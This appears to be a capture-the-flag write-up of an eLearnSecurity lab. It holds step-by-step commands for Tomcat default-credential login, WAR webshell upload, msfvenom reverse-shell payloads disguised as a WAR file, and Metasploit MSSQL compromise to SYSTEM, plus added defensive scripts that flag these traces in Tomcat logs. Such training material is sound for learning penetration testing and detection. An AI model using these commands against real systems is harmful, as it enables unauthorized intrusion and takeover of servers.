Here we go.
First CTF from eLearnSecurity's PTS course.
[Apache Tomcat, SQL Server]
Connected to internal network via eth0.
Task: find flags on all hosts connected to network.
⇒ Tools used: Nmap, Dirb, Netcat & Metasploit (MSFvenom, MSFpayload & Listener for reverse TCP shell)
Stage I - Information Gathering:
was omitted, since we're already inside the network and no OSINT or public-site search would be relevant here. If anything, subdomain enumeration with sublist3r / amass would have made sense though. Next time.
Stage II - Footprinting and Scanning:
Mapping the network with Nmap.
root@0xBlackhat:~ # nmap -sn 172.16.64.0/24 -oN discovery.nmap
-oN saves the normal output format to a file; a plain redirect with > discovery.nmap would do as well, but with -oN the output still appears on screen too. Alternatively fping works, but it prints nothing to the terminal once redirected:
fping -a -g 172.16.64.0/24 2>/dev/null > test.nmap
root@0xBlackhat:~# cat discovery.nmap | grep for | grep -v "\.10" | cut -d " " -f 5 > ipscan.txt
This keeps the "Nmap scan report for ..." lines, excludes your own IP and writes the remaining addresses to a file (note that grep -v "\.10" is a substring match, so it would also drop hosts such as .100 to .109). ipscan.txt is now fed to nmap to perform a full TCP scan:
root@0xBlackhat:~# nmap -sV -n -v -Pn -p- -T4 -iL ipscan.txt -A --open
Nmap scan report for 172.16.64.199
Host is up (0.067s latency).
Not shown: 65433 closed ports, 90 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: WIN10
|   NetBIOS_Domain_Name: WIN10
|   NetBIOS_Computer_Name: WIN10
|   DNS_Domain_Name: WIN10
|   DNS_Computer_Name: WIN10
|_  Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-02-08T22:15:06
| Not valid after:  2051-02-08T22:15:06
| MD5:   a5b8 5acf 2158 5e33 43c5 3f2e 341e e5fa
|_SHA-1: 8425 8f9f 8d8a 0677 1de5 d232 658e 695e d3d9 7307
|_ssl-date: 2021-02-11T01:13:44+00:00; 0s from scanner time.
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49943/tcp open  ms-sql-s      Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
|   Target_Name: WIN10
|   NetBIOS_Domain_Name: WIN10
|   NetBIOS_Computer_Name: WIN10
|   DNS_Domain_Name: WIN10
|   DNS_Computer_Name: WIN10
|_  Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-02-08T22:15:06
| Not valid after:  2051-02-08T22:15:06
| MD5:   a5b8 5acf 2158 5e33 43c5 3f2e 341e e5fa
|_SHA-1: 8425 8f9f 8d8a 0677 1de5 d232 658e 695e d3d9 7307
|_ssl-date: 2021-02-11T01:13:44+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info:
|   172.16.64.199:1433:
|     Version:
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| nbstat: NetBIOS name: WIN10, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:87:d9:d5 (VMware)
| Names:
|   WIN10<00>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WIN10<20>            Flags: <unique><active>
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-11T01:13:38
|_  start_date: 2021-02-08T22:14:56
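The discovery pipeline above drops the scanner's own address with grep -v "\.10", which is a substring match. As an added example (not part of the original write-up), here is a small shell function that parses the same nmap -sn normal output, takes the last field of each "Nmap scan report for" line (stripping the parentheses nmap prints around an address when it resolved a hostname) and excludes the scanner's address by exact comparison. The sample output and the addresses in it are constructed for the demo, and the function names are mine.

```bash
#!/bin/sh
# Added example (not from the write-up): pick live hosts out of
# `nmap -sn ... -oN discovery.nmap` output and drop the scanner's own
# address by exact comparison. The write-up's `grep -v "\.10"` is a
# substring match, so it would also discard 172.16.64.100-109 and
# 172.16.64.110-119 as targets.

# Constructed sample of nmap -sn normal output; addresses are made up.
SAMPLE_DISCOVERY='# Nmap 7.91 scan initiated (constructed sample)
Nmap scan report for 172.16.64.10
Host is up (0.00012s latency).
Nmap scan report for 172.16.64.100
Host is up (0.041s latency).
Nmap scan report for gateway.lab (172.16.64.1)
Host is up (0.0010s latency).
Nmap scan report for 172.16.64.140
Host is up (0.067s latency).
Nmap scan report for 172.16.64.199
Host is up (0.067s latency).
# Nmap done: 256 IP addresses (5 hosts up) scanned'

# live_hosts OWN_IP -- read nmap -sn output on stdin, print one target per line
live_hosts() {
    awk -v own="$1" '
        /^Nmap scan report for / {
            ip = $NF
            gsub(/[()]/, "", ip)   # "name (1.2.3.4)" -> "1.2.3.4"
            if (ip != own) print ip
        }'
}

# lost_by_substring_filter OWN_IP -- what the write-up pattern would have
# thrown away on top of OWN_IP: every remaining host whose address
# contains the substring ".10"
lost_by_substring_filter() {
    live_hosts "$1" | grep '\.10' || true
}

# stand-alone usage: the equivalent of the write-up's ipscan.txt, printed
printf '%s\n' "$SAMPLE_DISCOVERY" | live_hosts 172.16.64.10
```

Redirect the last line into a file and pass it to nmap -iL as in the write-up; the awk match on the report line also survives hostnames in the output, which the cut -f 5 field index does not.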
Victim 1: Apache Tomcat
8080/tcp  open  http  Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
9080/tcp  open  http  Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
59919/tcp open  http  Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's identify and exploit any Tomcat misconfigurations we can find.
The manager application sits at the default path /manager/html; try the default credentials first. Someone collected them on GitHub: https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown. HTTP Basic authentication sends the pair as base64(user:password), which is an encoding rather than a hash, and a bash loop over a user:pass list produces the tokens:
$ for cred in $(cat /home/user/directory/sub_directory/tomcat_userpass.txt); do echo -n $cred | base64; done
which will generate this list here:
YWRtaW46cGFzc3dvcmQ=
YWRtaW46
YWRtaW46UGFzc3dvcmQx
YWRtaW46cGFzc3dvcmQx
YWRtaW46YWRtaW4=
YWRtaW46dG9tY2F0
Ym90aDp0b21jYXQ=
bWFuYWdlcjptYW5hZ2Vy
cm9sZTE6cm9sZTE=
cm9sZTE6dG9tY2F0
cm9sZTpjaGFuZ2V0aGlz
cm9vdDpQYXNzd29yZDE=
cm9vdDpjaGFuZ2V0aGlz
cm9vdDpwYXNzd29yZA==
cm9vdDpwYXNzd29yZDE=
cm9vdDpyMDB0
cm9vdDpyb290
cm9vdDp0b29y
dG9tY2F0OnRvbWNhdA==
dG9tY2F0OnMzY3JldA==
dG9tY2F0OnBhc3N3b3JkMQ==
dG9tY2F0OnBhc3N3b3Jk
dG9tY2F0Og==
dG9tY2F0OmFkbWlu
dG9tY2F0OmNoYW5nZXRoaXM=
You can then use the list with Burp Suite's Intruder (attack type Sniper). Remember to uncheck the URL-encode option for the payload, otherwise the = padding of the base64 tokens gets mangled.
Somehow Metasploit's brute-forcing with wordlists doesn't work, even if you slow it down. Not a big deal; you can just try your luck manually, which actually worked instantly for me using tomcat:s3cret. If I remember correctly, their 403 page even suggests that combination lol
Ok, so now you have user access to the server, which is enough to upload and deploy files. Tomcat is a Java application server and deploys applications packaged as WAR files. Fortunately, someone uploaded a WAR webshell to GitHub: https://github.com/BustedSec/webshell/blob/master/webshell.war. Using our tomcat:s3cret user we deploy the webshell manually through the manager page.
Now opening /webshell should direct us to the webshell. In case it doesn't work straight away, append /index.jsp to the URL, i.e. /webshell/index.jsp.
Great, now we have a user and a webshell. Let's obtain a reverse shell with Metasploit payloads as a step towards root; connecting back from the victim (reverse TCP) rather than to it is what gets us past the firewall. Meterpreter WAR payloads don't work for some reason, so set up a Metasploit listener instead:
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set lhost 172.16.64.10
set lport 59919
run
Port 59919 is used because the scan showed it open on the victim; a connection on a different, unexpected port would make the firewall raise alarms, so the listener uses the same port number.
Generate the executable with MSFvenom as follows:
root@0xBlackhat:~ # msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=172.16.64.10 lport=59919 -f elf -o meter
Now rename the file to meter.war. The extension makes it look like a WAR archive; the contents of our executable are unchanged, but the manager will accept the upload:
root@0xBlackhat:~ # mv meter meter.war
Let's now upload this file through the /manager/html page as we previously did with the webshell. Deployment fails, since it's not a real archive, but the file is still a valid executable and it's on the server now, which is all we want.
Through the webshell (these commands run on the victim, not in our own terminal) we move the file out of the webapps directory and make it executable:
root@0xBlackhat:~ # mv /var/lib/tomcat8/webapps/meter.war /tmp/meter
root@0xBlackhat:~ # ls /tmp/meter
root@0xBlackhat:~ # chmod +x /tmp/meter
And we run as follows:
root@0xBlackhat:~ # /tmp/meter
And voilà, a new Meterpreter session opens up in our terminal; getuid shows we're in. Now it's about browsing the directories, which you can and should enumerate. I didn't, however, and also don't remember where exactly the flag was; I think somewhere in the /home/user/admin directory or similar.
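Everything done against the Tomcat host, from guessing manager credentials through uploading the webshell and the fake meter.war, leaves traces in the Tomcat access log. As an added example (not code from the write-up), here are three awk checks over access log lines in Tomcat's common pattern (%h %l %u %t "%r" %s %b) that surface those traces from the defender's side: a burst of 401 responses on the manager app from one client, every upload or deploy request to the manager, and requests to a .jsp carrying a command-style parameter. The log lines are constructed for the demo and the function names are mine.

```bash
#!/bin/sh
# Added example (not from the write-up): awk checks over Tomcat access log
# lines in the common pattern  %h %l %u %t "%r" %s %b.
# Field positions: $1 client IP, $3 authenticated user, $7 request path,
# $9 status code.

# Constructed sample log; IPs, times and paths are made up for the demo.
SAMPLE_ACCESS_LOG='172.16.64.10 - - [11/Feb/2021:01:20:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
172.16.64.10 - - [11/Feb/2021:01:20:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
172.16.64.10 - - [11/Feb/2021:01:20:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
172.16.64.10 - - [11/Feb/2021:01:20:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
172.16.64.10 - - [11/Feb/2021:01:20:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
172.16.64.10 - tomcat [11/Feb/2021:01:20:04 +0000] "GET /manager/html HTTP/1.1" 200 17214
172.16.64.10 - tomcat [11/Feb/2021:01:21:10 +0000] "POST /manager/html/upload HTTP/1.1" 200 18001
172.16.64.10 - - [11/Feb/2021:01:21:30 +0000] "GET /webshell/index.jsp?cmd=id HTTP/1.1" 200 512
172.16.64.10 - tomcat [11/Feb/2021:01:25:00 +0000] "POST /manager/html/upload HTTP/1.1" 200 18100
172.16.64.55 - - [11/Feb/2021:02:00:00 +0000] "GET /index.html HTTP/1.1" 200 11510
172.16.64.55 - - [11/Feb/2021:02:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473'

# manager_auth_failures THRESHOLD -- "ip count" for every client with at
# least THRESHOLD 401 responses on the manager app (credential guessing)
manager_auth_failures() {
    awk -v thr="$1" '
        $9 == 401 && $7 ~ /^\/manager\// { fails[$1]++ }
        END { for (ip in fails) if (fails[ip] >= thr) print ip, fails[ip] }'
}

# manager_deploys -- every upload/deploy request to the manager, with the
# account that made it. The manager reports a failed deployment inside the
# HTML body with status 200, so the status code alone does not separate a
# real WAR from a renamed executable like the meter.war above; each upload
# is worth a look.
manager_deploys() {
    awk '$7 ~ /^\/manager\/(html\/upload|text\/deploy)/ { print $1, $3, $7 }'
}

# suspicious_jsp -- requests to a .jsp that carry a command-style parameter,
# the shape of traffic a dropped webshell produces
suspicious_jsp() {
    awk '$7 ~ /\.jsp\?(cmd|exec|command)=/ { print $1, $7 }'
}

# stand-alone usage
printf '%s\n' "$SAMPLE_ACCESS_LOG" | manager_auth_failures 5
printf '%s\n' "$SAMPLE_ACCESS_LOG" | manager_deploys
printf '%s\n' "$SAMPLE_ACCESS_LOG" | suspicious_jsp
```

Feed a real localhost_access_log file into the same functions with cat; the threshold for manager_auth_failures is a parameter because the sensible value depends on how many legitimate administrators use the manager.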
Next host (172.16.64.140): port 80/tcp open, Apache httpd 2.4.18 (Ubuntu)
So let's enumerate directories with dirb and see what we find.
root@0xBlackhat:~ # dirb http://172.16.64.140
This uses the default wordlist /usr/share/dirb/wordlists/common.txt.
After a while http://172.16.64.140/project/ shows up and asks for credentials; let's try admin:admin. Default credentials again and we're in. Now let's run dirb with these credentials so the scan has the same access rights:
root@0xBlackhat:~ # dirb http://172.16.64.140/project -u admin:admin
This eventually gives us a couple more directories to browse and inspect.
One of those contains the credentials for the SQL Server on the network.
It's also the flag we needed to find.
The SQL Server (172.16.64.199). Since we already have the credentials, it's not much of a drama.
We can use Metasploit for this, loading the mssql_login module to verify them:
use auxiliary/scanner/mssql/mssql_login
set rhosts 172.16.64.199
set rport 1433
set username fooadmin
set password fooadmin
set verbose true
run
Metasploit's mssql_enum module helps us automate reconnaissance:
use auxiliary/admin/mssql/mssql_enum
set password fooadmin
set username fooadmin
set rport 1433
set rhosts 172.16.64.199
run
This is the part that takes some time, going through the displayed results; we get a lot of information about the database.
We see e.g. that the account is indeed a sysadmin-level account, so we can use it to compromise the server with the mssql_payload module, which executes the payload through xp_cmdshell:
use exploit/windows/mssql/mssql_payload
set password fooadmin
set username fooadmin
set srvport 53
set rhosts 172.16.64.199
set payload windows/x64/meterpreter_reverse_tcp
set lhost 172.16.64.13
set lport 443
run
This uploads the payload and a Meterpreter session opens in the terminal:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Let's spawn a shell and look for the flag:
meterpreter > shell
C:\> cd C:\Users
C:\Users> dir
And that's it. In one of those folders is the last flag.